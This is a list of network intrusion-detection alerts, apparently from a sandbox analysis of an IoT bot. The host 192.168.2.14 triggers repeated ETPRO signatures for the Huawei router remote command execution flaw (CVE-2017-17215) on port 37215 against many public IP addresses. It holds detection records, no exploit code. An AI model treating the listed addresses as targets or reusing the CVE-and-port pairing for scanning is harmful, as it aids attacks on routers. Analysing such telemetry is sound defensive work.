                                                        06/13/24-21:32:17.671295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5421237215192.168.2.14156.74.40.140
                                                        06/13/24-21:32:40.355006TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3994837215192.168.2.14197.89.6.82
                                                        06/13/24-21:32:30.096257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4428437215192.168.2.14156.229.107.45
                                                        06/13/24-21:32:44.452862TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4680037215192.168.2.14156.145.174.106
                                                        06/13/24-21:31:59.198270TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5810037215192.168.2.1441.26.181.224
                                                        06/13/24-21:32:38.300210TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4351037215192.168.2.1441.108.100.59
                                                        06/13/24-21:32:54.708427TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5773837215192.168.2.14156.138.232.15
                                                        06/13/24-21:31:57.138064TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5206037215192.168.2.14156.233.114.165
                                                        06/13/24-21:32:17.670786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5732237215192.168.2.1441.60.137.0
                                                        06/13/24-21:32:34.218173TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3358237215192.168.2.14197.9.94.180
                                                        06/13/24-21:32:30.098823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4798237215192.168.2.14197.52.212.29
                                                        06/13/24-21:33:05.017219TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5099437215192.168.2.1441.195.214.170
                                                        06/13/24-21:32:03.308525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6011637215192.168.2.14197.35.52.139
                                                        06/13/24-21:32:44.451258TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684237215192.168.2.14197.35.139.132
                                                        06/13/24-21:32:28.044417TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967437215192.168.2.14156.131.254.51
                                                        06/13/24-21:32:36.263448TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4822237215192.168.2.14197.27.107.39
                                                        06/13/24-21:33:15.258789TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3284437215192.168.2.14156.243.115.206
                                                        06/13/24-21:33:00.868309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3708437215192.168.2.14156.207.243.148
                                                        06/13/24-21:32:36.246618TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5876437215192.168.2.1441.84.17.77
                                                        06/13/24-21:33:05.014289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4935637215192.168.2.14156.237.5.109
                                                        06/13/24-21:32:36.245656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5015037215192.168.2.1441.128.58.47
                                                        06/13/24-21:32:42.403934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5394837215192.168.2.14156.237.131.86
                                                        06/13/24-21:32:05.348388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4984837215192.168.2.14156.143.19.96
                                                        06/13/24-21:33:11.158568TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3793637215192.168.2.14156.162.200.185
                                                        06/13/24-21:32:34.217985TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4899637215192.168.2.1441.238.185.215
                                                        06/13/24-21:32:25.990346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3561637215192.168.2.14156.155.197.176
                                                        06/13/24-21:32:42.406769TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4515237215192.168.2.1441.15.47.189
                                                        06/13/24-21:33:07.039668TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5877637215192.168.2.14197.211.73.44
                                                        06/13/24-21:32:03.274651TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4033437215192.168.2.1441.130.177.177
                                                        06/13/24-21:33:05.012556TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3998837215192.168.2.14156.31.124.182
                                                        06/13/24-21:32:25.972933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4275037215192.168.2.14197.27.0.95
                                                        06/13/24-21:32:17.671405TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6006037215192.168.2.14197.76.0.2
                                                        06/13/24-21:32:07.403364TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3586837215192.168.2.14197.31.140.13
                                                        06/13/24-21:32:13.567841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3768637215192.168.2.14197.174.105.220
                                                        06/13/24-21:32:32.165954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3817637215192.168.2.14156.67.175.70
                                                        06/13/24-21:32:03.277169TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4715837215192.168.2.14197.238.194.238
                                                        06/13/24-21:32:30.093980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5728637215192.168.2.14197.156.172.117
                                                        06/13/24-21:32:34.193036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3331637215192.168.2.14156.237.91.173
                                                        06/13/24-21:32:01.218708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4645437215192.168.2.14197.202.165.217
                                                        06/13/24-21:32:23.941362TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3403237215192.168.2.14156.170.217.216
                                                        06/13/24-21:32:44.453377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5771037215192.168.2.14156.89.2.18
                                                        06/13/24-21:32:11.484687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5158637215192.168.2.14156.143.140.200
                                                        06/13/24-21:32:23.832833TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3869237215192.168.2.14156.62.161.243
                                                        06/13/24-21:32:40.372257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4429637215192.168.2.1441.70.231.237
                                                        06/13/24-21:33:11.177726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4872437215192.168.2.14197.126.90.22
                                                        06/13/24-21:32:07.417449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5252637215192.168.2.14197.189.141.95
                                                        06/13/24-21:32:23.834861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3394837215192.168.2.14156.175.202.149
                                                        06/13/24-21:32:05.344589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4491237215192.168.2.14197.173.216.235
                                                        06/13/24-21:32:07.420268TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4309237215192.168.2.14197.136.203.186
                                                        06/13/24-21:31:57.091284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405837215192.168.2.14156.112.241.178
                                                        06/13/24-21:32:48.553849TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5972637215192.168.2.1441.84.5.129
                                                        06/13/24-21:32:03.278439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3458637215192.168.2.14197.212.212.239
                                                        06/13/24-21:32:13.546279TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4905037215192.168.2.14156.187.212.27
                                                        06/13/24-21:33:15.252640TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4438437215192.168.2.14156.91.148.147
                                                        06/13/24-21:32:09.456399TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3595637215192.168.2.14156.103.195.233
                                                        06/13/24-21:33:02.954047TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351637215192.168.2.14197.8.102.4
                                                        06/13/24-21:32:34.217517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3687437215192.168.2.14156.96.34.64
                                                        06/13/24-21:32:56.756387TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3785437215192.168.2.14156.144.129.136
                                                        06/13/24-21:32:09.437779TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3430837215192.168.2.14197.107.68.74
                                                        06/13/24-21:32:13.543522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3343237215192.168.2.1441.77.32.93
                                                        06/13/24-21:32:15.632816TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3427637215192.168.2.14197.208.53.63
                                                        06/13/24-21:32:58.820587TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4261237215192.168.2.14156.92.30.236
                                                        06/13/24-21:32:38.298398TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5860837215192.168.2.1441.87.181.148
                                                        06/13/24-21:33:07.042504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3314237215192.168.2.1441.127.67.177
                                                        06/13/24-21:33:05.011413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3637637215192.168.2.1441.173.19.216
                                                        06/13/24-21:31:59.199872TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314237215192.168.2.14156.131.45.177
                                                        06/13/24-21:33:15.253266TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5574437215192.168.2.14156.120.170.245
                                                        06/13/24-21:32:09.439993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4922237215192.168.2.14197.83.173.81
                                                        06/13/24-21:32:09.438408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4106037215192.168.2.14156.54.111.130
                                                        06/13/24-21:32:46.503076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4252837215192.168.2.14156.8.166.18
                                                        06/13/24-21:32:09.454035TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3932637215192.168.2.14156.120.10.52
                                                        06/13/24-21:32:11.505409TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5679037215192.168.2.1441.61.201.60
                                                        06/13/24-21:31:57.092754TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3334437215192.168.2.14156.99.213.65
                                                        06/13/24-21:32:54.710863TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5821237215192.168.2.1441.100.94.207
                                                        06/13/24-21:32:28.028947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3721237215192.168.2.14156.70.177.83
                                                        06/13/24-21:32:03.279974TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6056037215192.168.2.14197.93.242.33
                                                        06/13/24-21:33:09.106306TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5150437215192.168.2.14156.163.240.2
                                                        06/13/24-21:32:46.524874TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4579037215192.168.2.1441.135.37.66
                                                        06/13/24-21:32:09.457322TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3444037215192.168.2.14197.52.113.236
                                                        06/13/24-21:32:34.217883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4563637215192.168.2.14197.52.115.239
                                                        06/13/24-21:32:48.549822TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4659237215192.168.2.14156.247.162.114
                                                        06/13/24-21:32:21.785878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5736037215192.168.2.1441.178.254.242
                                                        06/13/24-21:32:05.346255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4322637215192.168.2.14156.132.252.77
                                                        06/13/24-21:33:13.228273TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4414837215192.168.2.14197.191.26.16
                                                        06/13/24-21:32:15.610742TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660237215192.168.2.14197.216.178.28
                                                        06/13/24-21:32:30.097210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4418837215192.168.2.14156.128.228.247
                                                        06/13/24-21:32:13.566622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4616837215192.168.2.1441.49.73.13
                                                        06/13/24-21:33:11.158296TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5231837215192.168.2.1441.9.77.185
                                                        06/13/24-21:33:04.991411TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3869237215192.168.2.14197.67.193.174
                                                        06/13/24-21:33:15.273345TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4308837215192.168.2.14156.125.16.199
                                                        06/13/24-21:32:17.675277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4561837215192.168.2.14197.139.236.84
                                                        06/13/24-21:32:28.026117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4138237215192.168.2.1441.207.66.51
                                                        06/13/24-21:33:04.991098TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3981437215192.168.2.14197.119.21.118
                                                        06/13/24-21:33:02.935522TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631037215192.168.2.14197.107.159.50
                                                        06/13/24-21:32:32.167797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854837215192.168.2.14156.143.243.85
                                                        06/13/24-21:32:42.407116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6083437215192.168.2.1441.168.243.107
                                                        06/13/24-21:32:54.707745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4286437215192.168.2.14197.165.217.11
                                                        06/13/24-21:32:50.632989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4216437215192.168.2.14197.113.196.194
                                                        06/13/24-21:33:07.043031TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5967237215192.168.2.14156.241.84.121
                                                        06/13/24-21:33:11.159608TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5279037215192.168.2.1441.187.194.122
                                                        06/13/24-21:33:15.275070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5628037215192.168.2.1441.43.93.15
                                                        06/13/24-21:32:42.421486TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4419237215192.168.2.1441.227.147.88
                                                        06/13/24-21:32:23.931323TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3616637215192.168.2.14156.85.45.22
                                                        06/13/24-21:32:54.725125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3907237215192.168.2.1441.7.184.121
                                                        06/13/24-21:33:09.111471TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5850037215192.168.2.14156.18.176.220
                                                        06/13/24-21:33:09.091384TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5466637215192.168.2.14197.159.14.173
                                                        06/13/24-21:32:52.671337TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5561037215192.168.2.14156.150.239.3
                                                        06/13/24-21:32:36.244422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5406237215192.168.2.14197.112.84.63
                                                        06/13/24-21:32:42.424082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3595837215192.168.2.14197.215.135.51
                                                        06/13/24-21:33:05.016252TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4300437215192.168.2.1441.170.220.176
                                                        06/13/24-21:32:44.475529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4005837215192.168.2.1441.210.159.220
                                                        06/13/24-21:32:46.509902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3674637215192.168.2.14156.121.90.243
                                                        06/13/24-21:33:13.213764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4738037215192.168.2.14156.99.203.50
                                                        06/13/24-21:33:02.954106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150237215192.168.2.1441.221.112.139
                                                        06/13/24-21:32:15.608025TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3796837215192.168.2.14197.243.54.29
                                                        06/13/24-21:32:48.570134TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4017837215192.168.2.14197.28.29.63
                                                        06/13/24-21:32:32.169708TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4458037215192.168.2.14156.15.227.128
                                                        06/13/24-21:33:17.341102TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4461437215192.168.2.1441.168.22.26
                                                        06/13/24-21:32:07.416735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5636437215192.168.2.14156.95.175.129
                                                        06/13/24-21:32:30.073847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4563037215192.168.2.1441.149.73.123
                                                        06/13/24-21:32:28.027324TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3778037215192.168.2.1441.81.210.70
                                                        06/13/24-21:32:50.615777TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3884637215192.168.2.1441.182.140.163
                                                        06/13/24-21:32:09.458595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5066637215192.168.2.14156.95.226.206
                                                        06/13/24-21:32:30.077558TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5640237215192.168.2.14156.95.255.25
                                                        06/13/24-21:32:32.153497TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4971037215192.168.2.1441.156.85.235
                                                        06/13/24-21:32:17.672529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5349437215192.168.2.14156.146.212.183
                                                        06/13/24-21:32:13.566970TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727037215192.168.2.1441.123.130.11
                                                        06/13/24-21:32:15.611011TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5162637215192.168.2.14197.124.67.218
                                                        06/13/24-21:33:17.307221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3351037215192.168.2.1441.145.143.100
                                                        06/13/24-21:33:02.954911TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3423637215192.168.2.14156.45.60.162
                                                        06/13/24-21:32:34.195689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5828437215192.168.2.14156.222.64.35
                                                        06/13/24-21:32:25.970886TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5538037215192.168.2.14156.211.86.198
                                                        06/13/24-21:32:11.486783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5654037215192.168.2.14197.49.93.203
                                                        06/13/24-21:33:00.870971TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4106837215192.168.2.14197.73.15.141
                                                        06/13/24-21:32:46.525538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4287237215192.168.2.14156.67.87.37
                                                        06/13/24-21:32:40.377610TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177837215192.168.2.14156.197.125.41
                                                        06/13/24-21:32:42.405647TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4498237215192.168.2.14156.105.247.193
                                                        06/13/24-21:32:52.677203TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5457637215192.168.2.14197.76.38.186
                                                        06/13/24-21:33:15.254913TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4637437215192.168.2.14156.136.200.181
                                                        06/13/24-21:32:11.507412TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6050237215192.168.2.1441.105.121.146
                                                        06/13/24-21:32:50.632189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5892237215192.168.2.14156.149.249.136
                                                        06/13/24-21:32:19.753705TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4992437215192.168.2.1441.150.106.6
                                                        06/13/24-21:33:04.993922TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5757237215192.168.2.1441.98.242.2
                                                        06/13/24-21:32:54.711810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3529637215192.168.2.14197.114.20.64
                                                        06/13/24-21:32:42.422275TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3822837215192.168.2.14156.197.168.178
                                                        06/13/24-21:31:57.137673TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3345437215192.168.2.14156.44.92.123
                                                        06/13/24-21:33:09.086751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5545237215192.168.2.14197.224.53.220
                                                        06/13/24-21:33:09.087329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473237215192.168.2.1441.120.214.18
                                                        06/13/24-21:32:13.546117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3987237215192.168.2.14197.9.4.241
                                                        06/13/24-21:31:57.137140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6013237215192.168.2.1441.107.231.137
                                                        06/13/24-21:32:01.247953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4702237215192.168.2.14156.210.92.132
                                                        06/13/24-21:33:15.259225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4396437215192.168.2.14197.218.115.103
                                                        06/13/24-21:32:23.942438TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3830237215192.168.2.14197.10.123.157
                                                        06/13/24-21:32:32.169845TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5396037215192.168.2.14197.122.102.37
                                                        06/13/24-21:32:15.632518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4970437215192.168.2.14197.244.247.131
                                                        06/13/24-21:32:17.695753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3308037215192.168.2.14197.11.63.223
                                                        06/13/24-21:32:36.246444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5045837215192.168.2.1441.118.53.39
                                                        06/13/24-21:32:19.728216TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4082637215192.168.2.14197.99.196.34
                                                        06/13/24-21:33:04.992959TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5094237215192.168.2.1441.199.73.34
                                                        06/13/24-21:33:09.109437TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4876637215192.168.2.14197.129.5.89
                                                        06/13/24-21:32:42.421690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762437215192.168.2.14197.165.250.202
                                                        06/13/24-21:32:23.943975TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3706037215192.168.2.1441.246.182.151
                                                        06/13/24-21:33:00.889242TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5462037215192.168.2.1441.253.178.4
                                                        06/13/24-21:31:59.176893TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5722037215192.168.2.14156.219.224.72
                                                        06/13/24-21:31:59.196346TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5761637215192.168.2.14156.87.247.69
                                                        06/13/24-21:32:40.354515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4427637215192.168.2.1441.118.159.163
                                                        06/13/24-21:31:57.092439TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3755037215192.168.2.14197.112.42.248
                                                        06/13/24-21:32:09.440957TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5713037215192.168.2.1441.50.52.157
                                                        06/13/24-21:32:11.484778TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5155437215192.168.2.1441.67.185.231
                                                        06/13/24-21:32:23.835930TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5600037215192.168.2.14156.66.157.49
                                                        06/13/24-21:32:32.154167TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3869237215192.168.2.14197.91.25.253
                                                        06/13/24-21:32:42.421368TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4725437215192.168.2.14197.130.159.241
                                                        06/13/24-21:32:46.501801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4238037215192.168.2.1441.212.80.83
                                                        06/13/24-21:32:23.833472TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5408437215192.168.2.14197.93.37.57
                                                        06/13/24-21:33:00.868217TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4405637215192.168.2.14197.51.179.188
                                                        06/13/24-21:32:13.545961TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3866437215192.168.2.14197.217.204.207
                                                        06/13/24-21:32:01.240689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4156837215192.168.2.14156.92.147.164
                                                        06/13/24-21:32:34.217351TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5882637215192.168.2.14197.201.66.150
                                                        06/13/24-21:32:25.975204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3879237215192.168.2.1441.42.82.139
                                                        06/13/24-21:32:42.406399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4060637215192.168.2.1441.212.41.84
                                                        06/13/24-21:33:17.310053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5370237215192.168.2.14197.191.216.86
                                                        06/13/24-21:32:09.456208TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4781437215192.168.2.1441.108.253.155
                                                        06/13/24-21:32:40.356947TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3594237215192.168.2.14156.203.154.122
                                                        06/13/24-21:33:02.936656TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4296237215192.168.2.14197.176.152.134
                                                        06/13/24-21:32:58.821884TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4328037215192.168.2.14197.152.212.17
                                                        06/13/24-21:33:13.228915TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5008037215192.168.2.14156.102.131.0
